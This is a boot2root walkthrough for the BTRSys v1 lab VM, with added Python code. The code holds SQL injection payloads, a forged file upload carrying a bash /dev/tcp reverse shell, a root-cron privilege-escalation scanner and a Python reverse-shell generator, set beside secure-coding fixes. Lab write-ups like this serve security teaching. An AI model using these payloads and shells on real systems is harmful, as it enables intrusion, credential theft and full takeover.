BTRSys: v1

[ vulnhub boot2root walkthrough ]

Goal

uid=0(root) gid=0(root) groups=0(root)

Download

https://www.vulnhub.com/entry/btrsys-v1,195/

Walkthrough

An initial nmap scan shows three open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).

FTP is a decoy; there is nothing useful on it, so we move on to the web server.

Browsing to the web page on port 80 turns up nothing on first inspection.

Running nikto against the site reveals a login.php page.

login.php is a standard username/password login form.

Looking at the page source, the form POSTs to personel.php and there is client-side JavaScript enforcing some validation rules on the input.

Testing the first rule confirms the checks are active.

Requesting personel.php directly produces a MySQL error, a strong hint that user input reaches a database query unsanitised.

From the rules we know the username must contain btrisk.com, so we submit a value that satisfies the check and intercept the POST with Burp.

We feed the captured request to sqlmap, which confirms that the 'kullanici_adi' parameter (Turkish for username) is injectable.

Dumping the database with sqlmap yields usernames and passwords.
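To make the injection above concrete, here is an added, stand-alone reconstruction of the login query and the three things sqlmap did with it (provoke an error, bypass the password check, dump the table). This is not the BTRSys VM's PHP code, which we never see; the table layout, the column names kullanici_adi/parola, the sample rows and the use of SQLite in place of MySQL are all assumptions made for the demo. The payloads keep btrisk.com in them so they would also pass the page's client-side rule.

```python
"""
Added example: reconstruction of the personel.php SQL injection.
Not code from the BTRSys VM or the original walkthrough.  Table name, column
names, sample rows and the SQLite backend are constructed for the demo.
"""
import sqlite3


def make_db():
    """In-memory table shaped like the one we later dumped (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE personel (kullanici_adi TEXT, parola TEXT)")
    conn.executemany(
        "INSERT INTO personel VALUES (?, ?)",
        [("admin@btrisk.com", "adminpass"), ("user@btrisk.com", "userpass")],
    )
    return conn


def login_vulnerable(conn, kullanici_adi, parola):
    """The bug: user input is pasted straight into the SQL text, so quotes,
    comments and UNIONs in the username become SQL syntax."""
    sql = ("SELECT kullanici_adi FROM personel "
           "WHERE kullanici_adi='%s' AND parola='%s'" % (kullanici_adi, parola))
    return [r[0] for r in conn.execute(sql).fetchall()]


def login_fixed(conn, kullanici_adi, parola):
    """The fix: a parameterised query; the driver sends the values separately
    and they can never alter the statement's structure."""
    rows = conn.execute(
        "SELECT kullanici_adi FROM personel WHERE kullanici_adi=? AND parola=?",
        (kullanici_adi, parola),
    ).fetchall()
    return [r[0] for r in rows]


def raises_db_error(conn, kullanici_adi):
    """Mirror of the first symptom on the box: a stray quote breaks the query
    and the database error is shown to the client.  True if the query errors."""
    try:
        login_vulnerable(conn, kullanici_adi, "x")
        return False
    except sqlite3.OperationalError:
        return True


# Each payload contains btrisk.com so the browser-side rule is satisfied too.
PROBE = "a@btrisk.com'"                       # unbalanced quote -> DB error
BYPASS = "admin@btrisk.com' -- "              # comments out the password check
DUMP = ("x@btrisk.com' UNION ALL SELECT kullanici_adi || ':' || parola "
        "FROM personel -- ")                   # what sqlmap's --dump amounts to


if __name__ == "__main__":
    db = make_db()
    print("probe raises error:", raises_db_error(db, PROBE))
    print("auth bypass      :", login_vulnerable(db, BYPASS, "wrong"))
    print("table dump       :", login_vulnerable(db, DUMP, "wrong"))
    print("fixed, same input:", login_fixed(db, BYPASS, "wrong"))
```

Running it shows the probe erroring out, the bypass payload logging in as admin without a password, the UNION payload returning every username:password pair, and the parameterised version returning nothing for the same inputs.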

Logging in with one of the recovered credentials gets us an authenticated area with a file upload feature.

Looking at the page source, the upload form only allows .jpg or .png files, and the check is done in client-side JavaScript.

As a first test we rename a .php file to .php.jpg and upload it.

Success!

A complete guess that the files land in an uploads/ directory turns out to be right :)

Now to get a PHP reverse shell onto the box: we upload it as .php.jpg, intercept the request in Burp and strip the .jpg suffix from the filename. Since the extension check only runs in the browser, the server accepts the .php file as-is.

Success!

With a netcat listener ready, we browse to the uploaded PHP file in uploads/ and get a shell back.
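The Burp step above comes down to one thing: the filename in the multipart request is chosen by the client, so a check that lives in the browser's JavaScript is no check at all. The added example below is not code from the VM or the original walkthrough; it builds the same forged upload by hand, shows the browser-side rule it sidesteps, and, for contrast, the server-side check that would have stopped it. The target URL, the form field name dosya, the listener address 10.0.0.5:4444 and the exact shape of the page's JavaScript test are assumptions.

```python
"""
Added example: the .php.jpg -> .php upload bypass done without Burp, next to
the server-side check that would have blocked it.  Not code from the BTRSys VM
or the walkthrough.  URL, field name, listener address and the form of the
JavaScript check are assumptions.
"""
import secrets
import urllib.request

ALLOWED_EXT = (".jpg", ".png")
# Magic bytes a server can use to confirm the content really is an image.
MAGIC = {b"\xff\xd8\xff": ".jpg", b"\x89PNG\r\n\x1a\n": ".png"}

# Minimal PHP reverse shell; listener address is a placeholder.
PHP_SHELL = (b"<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 "
             b"0>&1'\"); ?>\n")


def client_side_check(filename):
    """What the page's JavaScript enforces (assumed: a case-insensitive suffix
    test).  It runs on the attacker's machine, so it proves nothing."""
    return filename.lower().endswith(ALLOWED_EXT)


def build_multipart(field, filename, content, boundary=None):
    """Hand-build a multipart/form-data body.  The filename is whatever we put
    here, which is exactly what editing it in Burp achieves."""
    boundary = boundary or secrets.token_hex(16)
    body = (
        b"--" + boundary.encode() + b"\r\n"
        + b'Content-Disposition: form-data; name="' + field.encode()
        + b'"; filename="' + filename.encode() + b'"\r\n'
        + b"Content-Type: application/octet-stream\r\n\r\n"
        + content + b"\r\n"
        + b"--" + boundary.encode() + b"--\r\n"
    )
    return "multipart/form-data; boundary=" + boundary, body


def upload(url, field, filename, content, cookie):
    """Send the forged request using the session cookie obtained after the
    SQLi login.  Returns the HTTP status (network call; not run offline)."""
    ctype, body = build_multipart(field, filename, content)
    req = urllib.request.Request(url, data=body, method="POST")
    req.add_header("Content-Type", ctype)
    req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req) as resp:
        return resp.status


def server_side_accept(filename, content):
    """How the server should have checked: allowlisted extension AND matching
    magic bytes, stored under a random name so the submitted name never
    reaches disk.  Returns the name to store under, or None to reject."""
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        return None
    if not any(content.startswith(m) and e == ext for m, e in MAGIC.items()):
        return None
    return secrets.token_hex(8) + ext


if __name__ == "__main__":
    for name in ("shell.php.jpg", "shell.php"):
        print(name, "browser check:", client_side_check(name),
              "server check:", server_side_accept(name, PHP_SHELL))
    # upload("http://TARGET/upload.php", "dosya", "shell.php", PHP_SHELL,
    #        "PHPSESSID=...")   # assumed URL/field; fill in from Burp
```

shell.php.jpg passes the browser check, shell.php does not, and neither passes the server-side check because the content is PHP rather than a JPEG or PNG; a real image named photo.jpg is accepted and stored under a random name.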

Looking in /home there is only one directory, troll, which does not correspond to any account in /etc/passwd.

Enumerating further, we find an interesting log file called cronlog.

It shows a root cron job that runs every 2 minutes, calling a Python script that removes everything in the tmp folder. That script is writable by our low-privileged web shell user, which is the privilege escalation path.

Editing the script from a bare reverse shell is painful, so we copy it to the uploads folder, download it over HTTP and edit it locally.

We edit the script so that it opens a reverse shell back to our machine on a different port from the first one.

Now to get the modified script back onto the victim. We first delete the copy from the uploads folder, then upload the edited version using the same Burp trick as for the PHP shell.

Then we copy the uploaded file over the original cron script.

Finally we start a second netcat listener on the new port, wait for the cron job to fire... and BOOM, root.
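The escalation above rests on one fact: a script that root runs from cron is writable by the web user. The added example below is not the VM's cron script or the walkthrough's edited copy; it checks for that condition systematically (parse the crontab, find the script each root job actually runs, test whether our uid can write it) and generates the Python reverse shell to drop over it. The crontab lines, the path /opt/scripts/clean_tmp.py and the listener 10.0.0.5:4445 are constructed for the demo; the real path came from cronlog and is not shown in the walkthrough.

```python
"""
Added example: find root cron jobs whose script a low-privileged user can
overwrite, and build the reverse-shell payload to put there.  Not code from
the BTRSys VM or the walkthrough.  Crontab contents, script path and listener
address are constructed.
"""
import os
import stat
from collections import namedtuple

# Constructed /etc/crontab-style lines: minute hour dom month dow user command
CRONTAB_SAMPLE = """\
# m h dom mon dow user command
*/2 * * * * root /usr/bin/python /opt/scripts/clean_tmp.py
0 3 * * * root /usr/bin/apt-get update
"""

FakeStat = namedtuple("FakeStat", "st_mode st_uid st_gid")


def parse_crontab(text):
    """Return (schedule, user, command) for each job line in system-crontab format."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        jobs.append((" ".join(parts[:5]), parts[5], parts[6]))
    return jobs


def script_in_command(command):
    """The file worth overwriting is the script, not the interpreter in front
    of it.  Returns the first absolute .py/.sh path, or None."""
    for tok in command.split():
        if tok.startswith("/") and tok.endswith((".py", ".sh")):
            return tok
    return None


def writable_by(mode, file_uid, file_gid, uid, gids):
    """Pure permission check for a user with (uid, gids).  uid 0 is deliberately
    not special-cased: the question is whether a low-privileged user can
    modify a script that root will execute."""
    if uid == file_uid and mode & stat.S_IWUSR:
        return True
    if file_gid in gids and mode & stat.S_IWGRP:
        return True
    return bool(mode & stat.S_IWOTH)


def stat_from_table(table):
    """Build a stat_fn from {path: FakeStat} so the check can run offline."""
    def _stat(path):
        if path not in table:
            raise FileNotFoundError(path)
        return table[path]
    return _stat


def root_jobs_we_can_overwrite(crontab_text, stat_fn=os.stat, uid=None, gids=None):
    """List (schedule, script) for root jobs whose script we can write to."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) if gids is None else set(gids)
    hits = []
    for schedule, user, command in parse_crontab(crontab_text):
        path = script_in_command(command)
        if user != "root" or path is None:
            continue
        try:
            st = stat_fn(path)
        except OSError:
            continue
        if writable_by(st.st_mode, st.st_uid, st.st_gid, uid, gids):
            hits.append((schedule, path))
    return hits


def reverse_shell_script(host, port):
    """Python source to copy over the cron script: when cron next runs it as
    root, stdin/stdout/stderr of an interactive shell are tied to our socket."""
    return (
        "import os, socket, subprocess\n"
        f"s = socket.socket(); s.connect(({host!r}, {port}))\n"
        "for fd in (0, 1, 2):\n"
        "    os.dup2(s.fileno(), fd)\n"
        "subprocess.call(['/bin/sh', '-i'])\n"
    )


if __name__ == "__main__":
    with open("/etc/crontab") as f:
        for sched, path in root_jobs_we_can_overwrite(f.read()):
            print(f"{sched}  {path}  <- writable; replace with reverse_shell_script()")
```

On the box the equivalent manual steps were reading cronlog and ls -l on the script; the generated payload is the same shape as the edited script in the walkthrough, with a listener on a second port so the first shell stays usable while waiting for cron.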

Written on October 29, 2017